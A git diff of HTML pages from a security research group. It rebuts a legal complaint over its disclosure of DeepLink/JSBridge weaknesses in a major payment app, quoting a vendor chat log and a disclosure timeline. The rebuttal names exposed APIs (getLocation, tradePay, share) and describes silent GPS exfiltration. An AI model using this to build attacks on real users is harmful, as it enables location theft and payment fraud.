<p style="margin-bottom:12px;"><strong>Category:</strong> Content infringing reputation/goodwill/privacy/likeness</p>
<p style="margin-bottom:0;"><strong>Platform:</strong> WeChat Official Account Platform</p>
</div>
<h3>Our Position: The Complaint Has No Merit</h3>
<p><strong>1. The article names no company</strong> — Our WeChat article contains zero mentions of "Alipay," "支付宝," "Ant Group," or any identifiable corporate name. Under PRC Civil Code Article 1024, reputation infringement requires targeting a "specific subject." By filing this complaint, the complainant effectively self-identified their client as the article's subject.</p>
<p><strong>2. All content is factual and evidence-backed</strong> — Under PRC Civil Code Article 1025, one shall not bear civil liability for supervising public interest when the content is truthful and does not exceed reasonable limits. Our article is based on 308 server logs, testing across 3 real devices, and 42 screenshots. All findings are independently reproducible.</p>
<p><strong>3. The vendor's own security team verified the vulnerability</strong> — During the private reporting phase, the vendor assigned a security business lead to coordinate and verify our findings. When this person tested on their own iPhone 16 Pro in Hangzhou, GPS coordinates were transmitted directly to our server with <strong>no authorization prompt whatsoever</strong>. This directly contradicts the complainant's claim that "location access always prompts the user." This verification also revealed that the iOS attack surface is significantly larger than Android — exposing 5 additional sensitive APIs including tradePay (payment SDK) and share (worm propagation vector).</p>
<p><strong>4. The vendor's own classification eliminates infringement</strong> — After personally verifying all the above facts, the vendor's security team still responded on 2026-03-10: "These are normal features." Discussing an app's "normal features" cannot logically constitute "reputation infringement." When a company knowingly ignores verified risks and then uses legal means to suppress public awareness — that is not rights protection, it is concealment.</p>
<p><strong>5. Consumer right to know</strong> — PRC Consumer Rights Protection Law Article 8 guarantees consumers the right to know the true conditions of products and services they use. When a payment tool used by 1B+ users has features exploitable via external links, security research and public discussion serve the legitimate public interest.</p>
<p><strong>6. Responsible disclosure fully compliant</strong> — We submitted 4 rounds of private reports (2026-02-25 to 2026-03-07) before public disclosure. We waited for the vendor's explicit response ("normal features"). Per ISO/IEC 29147:2018 and Google Project Zero's 90-day standard, our process is fully compliant.</p>
<p>We have submitted complete appeal materials to the WeChat platform. If the complainant disputes the technical facts, we welcome verification through an independent third-party technical assessment.</p>
<p style="font-size:14px;color:var(--text2);margin-top:20px;"><strong>Full rebuttal article:</strong> <a href="https://innora.ai/zfb/rebuttal.html">How Can an Article That Never Mentions "Alipay" Constitute "Reputation Infringement"?</a></p>
</div>
</section>
<!-- ==================== DISCLAIMER ==================== -->
<section>
<h2>
<span class="zh">免责声明</span>
<span class="en">Disclaimer</span>
<span class="zh">法律声明与免责</span>
<span class="en">Legal Notice & Disclaimer</span>
</h2>
<div class="callout info">
<div class="zh">
<h3 style="margin-top:0;">研究性质声明</h3>
<ul>
<li>本研究完全出于安全研究和教育目的,符合《宪法》第四十七条规定的科学研究自由。</li>
<li>所有测试均在研究者自己的设备和自有账户上进行,未对任何第三方系统造成损害。</li>
<li>研究团队为独立安全研究机构,不从事支付业务,与任何竞品企业不存在商业利益关系。</li>
</ul>
<h3>负责任披露合规声明</h3>
<ul>
<li>在公开发布之前已通过4轮私下报告2026-02-25至2026-03-07向厂商提交全部发现及修复建议。</li>
<li>厂商于2026-03-10正式回复"属于正常功能",明确拒绝修复。</li>
<li>研究者在厂商明确关闭对话后公开研究结果,符合 ISO/IEC 29147:2018 负责任披露标准。</li>
<li>公开内容均为厂商已知的技术事实,不构成"未经授权发布网络安全信息"《网络安全法》第26条</li>
</ul>
<h3>法律依据</h3>
<ul>
<li><strong>《民法典》第1025条</strong>:为公共利益实施舆论监督,内容属实且未超出合理限度的,不承担民事责任。</li>
<li><strong>《消费者权益保护法》第8条</strong>:消费者享有知悉其使用的服务真实情况的权利。</li>
<li><strong>《民法典》第1024条</strong>:名誉权侵权需针对特定主体——本文未指名任何企业。</li>
<li><strong>CVSS 3.1</strong>:国际通用漏洞评分体系明确认定"需用户交互"的安全问题仍属有效安全发现。</li>
</ul>
<h3>内容安全声明</h3>
<ul>
<li>本研究完全出于安全研究和教育目的。</li>
<li>所有测试均在研究者自己的设备上进行。</li>
<li>测试账户为研究者本人账户。</li>
<li>在公开发布之前,已通过多轮负责任披露向蚂蚁集团报告了全部发现。</li>
<li>厂商回复这些是"正常功能",因此公开讨论不存在任何法律或道德问题。</li>
<li>本文不包含任何可直接用于攻击的完整 PoC 代码(关键参数已脱敏)。</li>
<li>在线演示页面为只读展示,已禁用全部数据外传功能。</li>
<li>我们对每个发现都诚实标注了验证状态,包括防护生效的部分。</li>
<li>文章中涉及资金操作的描述均明确注明"仍需用户手动确认"。</li>
</ul>
</div>
<div class="en">
<h3 style="margin-top:0;">Research Nature Statement</h3>
<ul>
<li>This research was conducted solely for security research and educational purposes, in accordance with the freedom of scientific research guaranteed by Article 47 of the PRC Constitution.</li>
<li>All testing was performed on the researcher's own devices and accounts. No third-party systems were harmed.</li>
<li>The research team is an independent security research institution with no payment business and no commercial interest with any competing enterprise.</li>
</ul>
<h3>Responsible Disclosure Compliance</h3>
<ul>
<li>All findings and remediation suggestions were submitted to the vendor through 4 rounds of private reports (2026-02-25 to 2026-03-07) before any public disclosure.</li>
<li>The vendor officially responded on 2026-03-10 with "normal functionality," explicitly declining to remediate.</li>
<li>Public disclosure occurred only after the vendor explicitly closed the dialogue, in compliance with ISO/IEC 29147:2018 responsible disclosure standards.</li>
<li>Published content covers only technical facts already known to the vendor and does not constitute "unauthorized publication of cybersecurity information" (Cybersecurity Law Article 26).</li>
</ul>
<h3>Legal Basis</h3>
<ul>
<li><strong>PRC Civil Code Article 1025</strong>: One shall not bear civil liability for supervising public interest when content is truthful and does not exceed reasonable limits.</li>
<li><strong>Consumer Rights Protection Law Article 8</strong>: Consumers have the right to know the true conditions of services they use.</li>
<li><strong>PRC Civil Code Article 1024</strong>: Reputation infringement requires targeting a specific subject — this article names no company.</li>
<li><strong>CVSS 3.1</strong>: The international vulnerability scoring system explicitly recognizes "user interaction required" findings as valid security issues.</li>
</ul>
<h3>Content Safety Statement</h3>
<ul>
<li>This research was conducted solely for security research and educational purposes.</li>
<li>All testing was performed on the researcher's own devices.</li>
<li>Test accounts belong to the researcher.</li>
<li>All findings were reported to Ant Group through multiple rounds of responsible disclosure before public release.</li>
<li>The vendor responded that these are "normal features," therefore public discussion poses no legal or ethical concerns.</li>
<li>This article does not contain any complete PoC code that could be directly used for attacks (critical parameters are sanitized).</li>
<li>We honestly labeled the verification status of each finding, including parts where defenses are working.</li>
<li>Online demonstration pages are read-only with all data exfiltration functionality disabled.</li>
<li>We honestly labeled the verification status of each finding, including parts where defenses are effective.</li>
<li>All descriptions involving financial operations explicitly note "user manual confirmation still required."</li>
</ul>
</div>
</div>

528
rebuttal.html Normal file
View File

@@ -0,0 +1,528 @@
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>法律投诉回应 | Legal Complaint Response — Innora AI Security Research</title>
<meta name="description" content="Response to complaint #428526665: An article that never mentions 'Alipay' cannot constitute 'reputation infringement'. Full legal and technical rebuttal.">
<meta name="author" content="Innora AI Security Research">
<meta property="og:title" content="支付宝安全研究遭律师函投诉 — 一篇零次提及'支付宝'的文章如何构成'商誉侵权'">
<meta property="og:description" content="投诉单号428526665。文章全文零次出现'支付宝''Alipay''蚂蚁集团'。308条日志、3台设备、42张截图。完整法律与技术反驳。">
<meta property="og:type" content="article">
<meta property="og:url" content="https://innora.ai/zfb/rebuttal.html">
<link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'><text y='.9em' font-size='90'>⚖️</text></svg>">
<style>
:root {
--bg: #0a0a0f;
--surface: #12121a;
--surface2: #1a1a28;
--border: #2a2a3a;
--text: #e0e0e8;
--text2: #9898a8;
--accent: #ff4444;
--accent2: #ff6b35;
--blue: #4488ff;
--green: #44cc88;
--max-w: 780px;
}
* { margin: 0; padding: 0; box-sizing: border-box; }
html { scroll-behavior: smooth; }
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Noto Sans SC', sans-serif;
background: var(--bg);
color: var(--text);
line-height: 1.8;
font-size: 16px;
}
a { color: var(--blue); text-decoration: none; }
a:hover { text-decoration: underline; }
.container { max-width: var(--max-w); margin: 0 auto; padding: 0 24px; }
/* Hero */
.hero {
padding: 60px 24px 40px;
text-align: center;
background: linear-gradient(180deg, #1a0a0a 0%, var(--bg) 100%);
border-bottom: 1px solid var(--border);
}
.hero-badge {
display: inline-block;
padding: 4px 14px;
border-radius: 20px;
background: rgba(255,68,68,.15);
color: var(--accent);
font-size: 13px;
font-weight: 600;
letter-spacing: 1px;
text-transform: uppercase;
margin-bottom: 16px;
}
.hero h1 {
font-size: clamp(22px, 4vw, 36px);
font-weight: 800;
line-height: 1.3;
margin-bottom: 12px;
background: linear-gradient(135deg, #ff4444, #ff6b35);
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
background-clip: text;
}
.hero .meta {
font-size: 14px;
color: var(--text2);
}
/* Sections */
section.content-section {
padding: 40px 0;
border-bottom: 1px solid var(--border);
}
h2 {
font-size: 22px;
font-weight: 700;
margin-bottom: 20px;
color: var(--text);
border-left: 4px solid var(--accent);
padding-left: 14px;
}
h3 { font-size: 18px; font-weight: 600; margin: 20px 0 12px; color: var(--text); }
p { margin-bottom: 14px; color: var(--text2); }
p strong { color: var(--text); }
/* Info box */
.info-box {
background: var(--surface);
border: 1px solid var(--border);
border-radius: 10px;
padding: 20px;
margin: 16px 0;
}
.info-box.alert {
border-left: 4px solid var(--accent);
background: rgba(255,68,68,.06);
}
.info-box.evidence {
border-left: 4px solid var(--green);
background: rgba(68,204,136,.06);
}
/* Claim rebuttal */
.claim-box {
background: rgba(255,68,68,.06);
border-left: 3px solid var(--accent);
padding: 16px 20px;
margin: 16px 0;
border-radius: 0 8px 8px 0;
}
.claim-label {
font-size: 13px;
font-weight: 700;
color: var(--accent);
text-transform: uppercase;
letter-spacing: .5px;
margin-bottom: 8px;
}
/* Timeline */
.timeline-item {
display: flex;
gap: 16px;
padding: 12px 0;
border-bottom: 1px solid var(--border);
}
.timeline-item:last-child { border-bottom: none; }
.timeline-date { color: var(--accent); font-weight: 600; min-width: 120px; font-size: 14px; flex-shrink: 0; }
.timeline-text { color: var(--text2); }
/* Stats */
.stat-grid {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(120px, 1fr));
gap: 16px;
margin: 16px 0;
}
.stat-item {
text-align: center;
background: var(--surface);
border: 1px solid var(--border);
border-radius: 8px;
padding: 16px;
}
.stat-num { font-size: 32px; font-weight: 800; color: var(--accent); }
.stat-label { font-size: 12px; color: var(--text2); text-transform: uppercase; letter-spacing: .5px; }
code {
font-family: 'SF Mono', 'Fira Code', 'Consolas', monospace;
font-size: 13px;
background: var(--surface2);
padding: 2px 6px;
border-radius: 4px;
color: var(--accent2);
}
/* Resolution list */
.resolution-list {
list-style: none;
counter-reset: res;
}
.resolution-list li {
counter-increment: res;
padding: 12px 0 12px 40px;
position: relative;
color: var(--text2);
border-bottom: 1px solid var(--border);
}
.resolution-list li:last-child { border-bottom: none; }
.resolution-list li::before {
content: counter(res);
position: absolute;
left: 0;
width: 28px;
height: 28px;
border-radius: 50%;
background: var(--accent);
color: #fff;
font-weight: 700;
font-size: 14px;
display: flex;
align-items: center;
justify-content: center;
}
/* Back link */
.back-link {
display: inline-block;
padding: 8px 20px;
background: var(--surface);
border: 1px solid var(--border);
border-radius: 6px;
color: var(--text);
font-size: 14px;
margin: 24px 0;
}
.back-link:hover { background: var(--surface2); text-decoration: none; }
/* Footer */
footer {
padding: 32px 24px;
text-align: center;
border-top: 1px solid var(--border);
font-size: 13px;
color: var(--text2);
}
</style>
</head>
<body>
<!-- Hero -->
<div class="hero">
<div class="hero-badge">LEGAL RESPONSE</div>
<h1>支付宝安全研究遭律师函投诉<br>一篇零次提及"支付宝"的文章<br>如何构成"商誉侵权"</h1>
<p class="meta">Innora AI Security Research | 2026-03-12 | 投诉单号 #428526665</p>
</div>
<div class="container">
<!-- 导语 -->
<section class="content-section">
<p>2026年3月11日 18:16我们在微信公众号发布了一篇移动支付应用的 DeepLink 攻击面技术分析文章。</p>
<p>同日 22:45 —— 发布仅 <strong style="color:var(--accent);">4小时29分钟</strong> 后 —— 北京格韵律师事务所代理提交了侵权投诉。</p>
<div class="info-box alert">
<p style="margin:4px 0;"><strong>投诉单号:</strong>428526665</p>
<p style="margin:4px 0;"><strong>投诉时间:</strong>2026-03-11 22:45:59</p>
<p style="margin:4px 0;"><strong>投诉方:</strong>北京格韵律师事务所31110000MD0196493T</p>
<p style="margin:4px 0;"><strong>投诉分类:</strong>内容侵犯名誉/商誉/隐私/肖像</p>
<p style="margin:4px 0;"><strong>投诉依据:</strong>《微信公众平台运营规范》4.1.2条</p>
</div>
<p>我们认为该投诉不成立。以下是基于事实和法律的完整回应。</p>
</section>
<!---->
<section class="content-section">
<h2>一、事实基础:文章全文零次提及"支付宝"</h2>
<p>我们对被投诉文章进行了全文关键词检索:</p>
<div class="stat-grid">
<div class="stat-item">
<div class="stat-num">0</div>
<div class="stat-label">"支付宝"</div>
</div>
<div class="stat-item">
<div class="stat-num">0</div>
<div class="stat-label">"Alipay"</div>
</div>
<div class="stat-item">
<div class="stat-num">0</div>
<div class="stat-label">"蚂蚁集团"</div>
</div>
</div>
<p>全文使用"国民支付应用""某头部支付平台""支付App"等通用表述。</p>
<p>根据<strong>《民法典》第 1024 条</strong>,名誉权侵权需满足"针对特定主体"的构成要件。一篇未指名任何企业的技术分析文章,从逻辑起点上就不具备商誉侵权的构成基础。</p>
<p>值得注意的是:<strong>投诉方通过主动提起投诉,反而自行确认了文章内容与其委托人的关联性。</strong></p>
</section>
<!---->
<section class="content-section">
<h2>二、内容属实308 条日志、3 台设备、42 张截图</h2>
<p>根据<strong>《民法典》第 1025 条</strong>,行为人为公共利益实施舆论监督,影响他人名誉的,不承担民事责任——前提是<strong>内容属实且未超出合理限度</strong></p>
<div class="info-box evidence">
<p style="margin:6px 0;"><strong>测试设备</strong>Samsung S25 Ultra新西兰、Redmi 12马来西亚、iPhone 16 Pro中国杭州</p>
<p style="margin:6px 0;"><strong>数据日志</strong>308 条完整服务器回传记录,含 GPS 坐标、设备信息、时间戳</p>
<p style="margin:6px 0;"><strong>可视证据</strong>42 张真机截图,完整记录每一步操作</p>
<p style="margin:6px 0;"><strong>独立验证</strong>:在线 PoC 页面(只读、不收集数据),任何安全研究人员可复现</p>
</div>
<p>根据国际通用漏洞评分体系 CVSS 3.1<code>User Interaction: Required</code> 是一项标准评分指标——需要用户交互的安全问题(如 XSS、CSRF、Clickjacking在全球范围内均被认定为有效安全发现。我们的研究发现符合 CWE-939Improper Authorization in Handler for Custom URL Scheme和 CWE-749Exposed Dangerous Method or Function等国际分类标准。</p>
<p>如果投诉方认为数据不实,我们欢迎通过第三方技术鉴定机构进行验证。</p>
</section>
<!---->
<section class="content-section">
<h2>三、逐条回应:投诉方三项"不实信息"主张</h2>
<div class="claim-box">
<div class="claim-label">投诉方主张一:"点击链接无弹窗提示"是不实的</div>
<p style="color:var(--text2);margin-bottom:8px;">投诉方称应用具备 URL 风险检测机制,跳转第三方页面必须经过安全检测。</p>
<p style="color:var(--text);margin:0;"><strong>事实</strong>:我们描述的是 JSBridge API 调用环节——当外部网页已在 App 内置 WebView 中加载后,调用 getLocation、startApp 等敏感 API 时不会弹出任何二次确认对话框。初始跳转时确实存在一个"继续访问"提示,但该提示<strong>未告知用户外部页面将获得调用内部 API 的能力</strong>。这是两个不同层面的问题。</p>
</div>
<div class="claim-box">
<div class="claim-label">投诉方主张二:"摄像头权限被拿走"是不实的</div>
<p style="color:var(--text2);margin-bottom:8px;">投诉方称摄像头权限需要用户授权同意。</p>
<p style="color:var(--text);margin:0;"><strong>事实</strong>:我们的原文第④条描述的是通过 getSystemInfo API 读取"摄像头/麦克风<strong>授权状态</strong>"——即 <code>cameraAuthorized: true/false</code> 这一布尔值。获取的是"用户是否已授权摄像头"的状态信息,<strong>不是获取摄像头权限本身,更不是控制摄像头</strong>。投诉方将"读取权限状态"偷换为"获取摄像头权限",属于对原文的歪曲。</p>
</div>
<div class="claim-box">
<div class="claim-label">投诉方主张三:"实时位置信息窃取"是不实的</div>
<p style="color:var(--text2);margin-bottom:8px;">投诉方称调用位置权限均以弹窗形式告知用户并获得授权同意。</p>
<p style="color:var(--text);margin:0;"><strong>事实</strong>:我们的原文明确标注了前提条件——"用户<strong>曾给 App 授过定位权限</strong>就会中招"。文章末尾"重要澄清"部分再次强调:"位置获取<strong>依赖用户此前已授予 App 的定位权限</strong>"。我们的实测证明:在上述前提条件下,外部页面调用 getLocation 时不会弹出任何二次确认弹窗。GPS 坐标被直接返回并可通过 XHR 发送至外部服务器。这有 3 台设备的测试记录和 308 条服务器日志为证。</p>
</div>
<p>三项主张均建立在对原文的断章取义之上。投诉方选择性忽略了文章中的限定条件、技术上下文和免责声明。</p>
</section>
<!---->
<section class="content-section">
<h2>四、厂商安全团队亲自验证GPS 数据无弹窗直接回传</h2>
<p>在私下报告阶段,厂商安全团队指派了一位<strong>安全业务负责人</strong>与我们对接,协同验证漏洞的真实性。</p>
<div class="info-box alert">
<h3 style="color:var(--accent);margin-top:0;">验证结果</h3>
<p>该安全业务负责人使用自有 iPhone 16 ProiOS 26.3.1)在<strong>中国杭州</strong>进行测试。测试过程中:</p>
<p style="margin:4px 0;">1. 点击测试链接后,<strong>页面加载到 GPS 数据回传仅历时约 7 秒</strong></p>
<p style="margin:4px 0;">2. <strong>全程未弹出任何 GPS 授权声明或提示</strong>iPhone 未出现任何系统级或应用级弹窗)</p>
<p style="margin:4px 0;">3. 共进行 3 轮测试GPS 精度逐轮提升:<strong>17.4m → 8.8m</strong>,均返回 <code>locationReducedAccuracy: 0</code>(精确定位模式)</p>
<p style="margin:4px 0;">4. 我们的服务器日志完整记录了此次数据回传,坐标指向杭州市区</p>
<p style="margin:4px 0;">5. 这次验证<strong>首次揭示了 iOS 攻击面显著大于 Android</strong> 这一此前未知的事实</p>
</div>
<p>这意味着:<strong>投诉方声称的"调用位置权限均以弹窗形式告知用户",被厂商自己的安全团队验证人员的实测所推翻。</strong></p>
<p>更重要的是,这次协同验证还揭示了一个此前未知的事实:<strong style="color:var(--accent);">iOS 版本的攻击面显著大于 Android 版本</strong></p>
<div class="info-box">
<h3 style="margin-top:0;">iOS 额外暴露的 5 个敏感 APIAndroid 均被拦截)</h3>
<table>
<thead>
<tr><th>API</th><th>Android</th><th>iOS</th><th>风险</th></tr>
</thead>
<tbody>
<tr><td><code>tradePay</code></td><td style="color:var(--green);">已拦截</td><td style="color:var(--accent);">可用</td><td>触发支付 SDK弹出收银台</td></tr>
<tr><td><code>share</code></td><td style="color:var(--green);">已拦截</td><td style="color:var(--accent);">可用</td><td><strong>蠕虫传播</strong> — 分享至微信/QQ/钉钉</td></tr>
<tr><td><code>getLocation</code></td><td style="color:var(--green);">需 checkJSAPI</td><td style="color:var(--accent);">直接返回</td><td>无二次确认获取 GPS</td></tr>
<tr><td><code>scan</code></td><td style="color:var(--green);">已拦截</td><td style="color:var(--accent);">可用</td><td>调用摄像头扫码</td></tr>
<tr><td><code>chooseImage</code></td><td style="color:var(--green);">已拦截</td><td style="color:var(--accent);">可用</td><td>访问用户相册</td></tr>
</tbody>
</table>
</div>
<p>厂商安全团队在知悉上述全部事实后,仍然给出了"正常功能"的定性。当企业明知风险存在而选择不修复,再通过法律手段阻止公众知情——这一系列行为的逻辑值得公众审视。</p>
</section>
<!---->
<section class="content-section">
<h2>五、逻辑矛盾:"正常功能"与"商誉侵权"不可能同时成立</h2>
<div class="info-box">
<div class="timeline-item">
<div class="timeline-date">2026-03-10</div>
<div class="timeline-text"><strong>厂商安全团队回复</strong>"根据我们的评估,这些属于正常功能"</div>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 ~18:03</div>
<div class="timeline-text"><strong>微信对话</strong>截图泰国时间17:03+1h厂商对接人确认"正常功能",我方告知将公开讨论(详见第六节)</div>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 18:16</div>
<div class="timeline-text"><strong>我们发布技术分析文章</strong>,讨论上述"正常功能"的安全影响</div>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 22:45</div>
<div class="timeline-text"><strong>律师事务所投诉</strong>"商誉侵权"</div>
</div>
</div>
<p>从"正常功能"到"商誉侵权",间隔不到 48 小时。这两个立场在逻辑上互斥:</p>
<p><strong>若确为正常功能</strong> — 讨论一款应用的公开功能属于正当技术交流,正如讨论汽车的制动系统设计不构成对车企的商誉侵权。</p>
<p><strong>若并非正常功能</strong> — 那么厂商的"正常功能"回复本身就构成对问题的回避。而研究者在合理等待期后公开讨论未修复的安全隐患,属于行使公众知情权。</p>
<p><strong>若讨论这些功能会损害商誉</strong> — 恰恰说明厂商自身也认识到这些功能设计存在不足。真正影响商誉的不是安全研究文章,而是问题本身。</p>
</section>
<!-- 六:微信聊天记录 -->
<section class="content-section">
<h2>六、微信聊天记录:发布前的关键对话</h2>
<p>以下是 2026年3月11日我们与厂商安全团队对接人的微信聊天记录完整截图已保存为证据<em style="color:var(--text2);font-size:14px;">截图时间显示为泰国时区UTC+7对应中国时间需加1小时。</em></p>
<div class="info-box" style="font-size:14px;line-height:2;">
<p style="margin:4px 0;"><strong style="color:var(--green);">17:03 我方:</strong>"漏洞的 就是 zfb的正常功能这是 最后官方解释了吧?"</p>
<p style="margin:4px 0;"><strong style="color:var(--blue);">厂商对接人:</strong>"嗯"</p>
<p style="margin:4px 0;"><strong style="color:var(--green);">我方:</strong>"好的 那我拿素材写小说了"</p>
<p style="margin:4px 0;"><strong style="color:var(--blue);">厂商对接人:</strong>"咋还写"</p>
<p style="margin:4px 0;"><strong style="color:var(--green);">我方:</strong>"不是漏洞 还不能说?"</p>
<p style="margin:4px 0;"><strong style="color:var(--green);">我方:</strong>"你看:能造成危害,然后你们说正常功能 我也没说一定是漏洞。。"</p>
<p style="margin:4px 0;"><strong style="color:var(--green);">我方:</strong>"总不能发声权利都没有吧"</p>
<p style="margin:4px 0;"><strong style="color:var(--green);">我方:</strong>"我还是继续写小说去了"</p>
<p style="margin:4px 0;"><strong style="color:var(--blue);">厂商对接人:</strong>"卧槽"</p>
<p style="margin:4px 0;"><strong style="color:var(--blue);">厂商对接人:</strong>"你这话说的,我这几天可是一直在跟进沟通,不能结果不符你意就还发吧?"</p>
<p style="margin:4px 0;"><strong style="color:var(--green);">我方:</strong>"我有点后悔和你们打交道了"</p>
<p style="margin:4px 0;"><strong style="color:var(--blue);">厂商对接人:</strong>"第一次报公司这边没及时处理确实有问题,这次你报个洞我们按照流程确认处置,你还不满意啊?"</p>
<p style="margin:4px 0;"><strong style="color:var(--blue);">厂商对接人:</strong>"你想怎么着,你说下你诉求"</p>
<p style="margin:4px 0;"><strong style="color:var(--green);">17:30 我方:</strong>"满意啊"</p>
<p style="margin:4px 0;"><strong style="color:var(--green);">我方:</strong>"都不是漏洞了 我公开说一下 总能说的吧?"</p>
<p style="margin:4px 0;"><strong style="color:var(--green);">我方:</strong>"你也不能太强权的 不是漏洞 还不让我说?"</p>
</div>
<p>这段对话揭示了以下关键事实:</p>
<div class="claim-box">
<div class="claim-label">关键证据分析</div>
<p style="color:var(--text);margin-bottom:10px;"><strong>1. 厂商对接人亲口确认了"正常功能"定性。</strong>对方回复"嗯"确认。</p>
<p style="color:var(--text);margin-bottom:10px;"><strong>2. 厂商对接人承认第一次报告处理有问题。</strong>"第一次报公司这边没及时处理确实有问题"——指2月25日的 TLS/SSL 报告。</p>
<p style="color:var(--text);margin-bottom:10px;"><strong>3. 对接人在对话中使用了"洞"这一表述。</strong>"这次你报个<strong style="color:var(--accent);"></strong>我们按照流程确认处置"——虽然这只是私下非正式用词,不代表厂商官方定性,但至少说明安全团队内部对这些发现的安全属性<strong>并非毫无认知</strong></p>
<p style="color:var(--text);margin-bottom:10px;"><strong>4. 我方在文章发布前已告知厂商。</strong>截图泰国时间17:03北京时间约18:03文章 18:16 发布。厂商对接人在得知我方意图后未提出正式暂缓请求。</p>
<p style="color:var(--text);margin:0;"><strong>5. 我方立场逻辑清晰。</strong>"不是漏洞 还不能说?""你也不能太强权的 不是漏洞 还不让我说?"——既然定性"正常功能",公开讨论就不构成不当行为。</p>
</div>
</section>
<!---->
<section class="content-section">
<h2>七、程序合规:完整的负责任披露流程</h2>
<p>我们严格遵循国际安全社区通行的负责任披露准则(参考 ISO/IEC 29147:2018。以下时间线的每一步均有邮件记录和服务器日志可查证</p>
<div class="info-box">
<div class="timeline-item">
<div class="timeline-date">2026-02-25</div>
<div class="timeline-text">首次私下报告:<strong>TLS/SSL 中间人攻击 + 设备指纹问题</strong>发送至厂商官方安全响应中心3个收件地址<br><span style="color:var(--text2);font-size:13px;">注:此次报告的是 TLS/SSL 相关问题DeepLink/JSBridge 攻击链尚未发现</span></div>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-06</div>
<div class="timeline-text">AntSRC 回复首次报告:<strong>"经过我们安全工程师审核,无法被实际利用"</strong></div>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 04:08</div>
<div class="timeline-text">第二次报告:发现 DeepLink+JSBridge 攻击链,提交 8 个漏洞2 CRITICAL + 4 HIGH</div>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 06:07</div>
<div class="timeline-text">第三次报告V3深度验证后扩展至 <strong>17 个漏洞</strong>,含资金操作风险,附 308 条服务器日志 + 42 张截图</div>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 07:54</div>
<div class="timeline-text">第四次报告端到端外部攻击完整演示3 台设备跨国验证(新西兰/马来西亚/中国),含在线复现链接</div>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 12:33</div>
<div class="timeline-text">厂商安全团队对接人回复:<strong>"漏洞报告邮件已收到,我们会安排人尽快分析,完了给你回复"</strong></div>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-08</div>
<div class="timeline-text">厂商安排安全业务负责人协同验证iPhone 16 Pro杭州GPS 数据无弹窗回传</div>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-09</div>
<div class="timeline-text">研究者测试账户因触发风控被封锁,向厂商发送解封申请</div>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-10</div>
<div class="timeline-text">厂商最终回复:<strong>"根据我们的评估,这些属于正常功能"</strong></div>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 ~18:03</div>
<div class="timeline-text">微信对话截图泰国时间17:03+1h厂商对接人确认"正常功能"定性,我方告知将公开讨论</div>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 18:16</div>
<div class="timeline-text">公开研究成果</div>
</div>
<div class="timeline-item">
<div class="timeline-date" style="color:var(--accent);">2026-03-11 22:45</div>
<div class="timeline-text" style="color:var(--text);"><strong>文章发布仅 4 小时 29 分钟后,北京格韵律师事务所提交侵权投诉</strong></div>
</div>
</div>
<p>以上时间线中,<strong>每一封邮件均保存在我们的邮件服务器</strong>(加密存储),厂商方回复同样有完整记录。</p>
<p>在一天之内3月7日我们连续提交了 3 份递进式报告8个→17个漏洞→端到端攻击演示每份都附带更完整的证据。厂商在安排人员亲自验证并确认漏洞可复现后仍给出"正常功能"的定性。Google Project Zero 的行业标准是给予厂商 90 天。我们从 DeepLink 漏洞报告到公开等待了 4 天,在此期间厂商已明确回复不予修复。</p>
</section>
<!---->
<section class="content-section">
<h2>八、公共利益10 亿用户的知情权</h2>
<p><strong>《消费者权益保护法》第八条</strong>规定:消费者享有知悉其购买、使用的商品或者接受的服务的真实情况的权利。</p>
<p>当一款日活超过 10 亿的支付应用存在可被外部链接利用的攻击面时,用户有权知道:点击一条链接后,他们的设备信息、位置数据可能被以何种方式获取,他们看到的界面是否可能被伪造。</p>
<p>安全研究的价值不在于"攻击",而在于"预警"。我们在文章中同时提供了 5 项具体的安全加固建议,这是建设性技术讨论,不是恶意抹黑。</p>
</section>
<!---->
<section class="content-section">
<h2>九、我们的立场</h2>
<p>Innora AI 是独立安全研究机构。我们与投诉方不存在任何商业竞争关系,不从事支付业务,不代表任何竞品利益。</p>
<p>我们的研究基于可复现的技术实验,结论附有完整证据链。文章中每一处涉及攻击条件的描述都标注了前提限定,每一处涉及资金操作的描述都注明了"仍需用户确认"。</p>
<p>如果投诉方对技术事实有异议,我们愿意通过以下方式解决:</p>
<ul class="resolution-list">
<li>接受第三方技术鉴定机构对 308 条日志的真实性验证</li>
<li>在中立技术专家见证下复现全部测试</li>
<li>如经验证存在不实内容,我们将立即更正并公开致歉</li>
</ul>
<p style="margin-top:20px;">但我们不会因为一封律师函就撤回基于事实的技术研究。用法律手段消除技术事实,从来不是解决安全问题的正确方式。</p>
</section>
<!-- 链接 -->
<section class="content-section" style="text-align:center;">
<a href="https://innora.ai/zfb/" class="back-link">← 返回完整技术报告</a>
<p style="font-size:14px;margin-top:16px;">联系我们:<strong>feng@innora.ai</strong></p>
</section>
</div>
<!-- Footer -->
<footer>
<p><strong>法律声明</strong>:本文所有陈述均基于可验证的技术实验结果。研究遵循 ISO/IEC 29147:2018 负责任披露标准。根据《民法典》第1025条为公共利益实施的舆论监督内容属实且未超出合理限度的不承担民事责任。</p>
<p style="margin-top:12px;">&copy; 2026 Innora AI Security Research | <a href="https://innora.ai">innora.ai</a> | 最后更新: 2026-03-12</p>
</footer>
</body>
</html>

27
wechat_article.html
View File

@@ -1,13 +1,20 @@
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>位置被秒偷10亿人每天在用的App17个「正常功能」细思极恐</title>
<style>
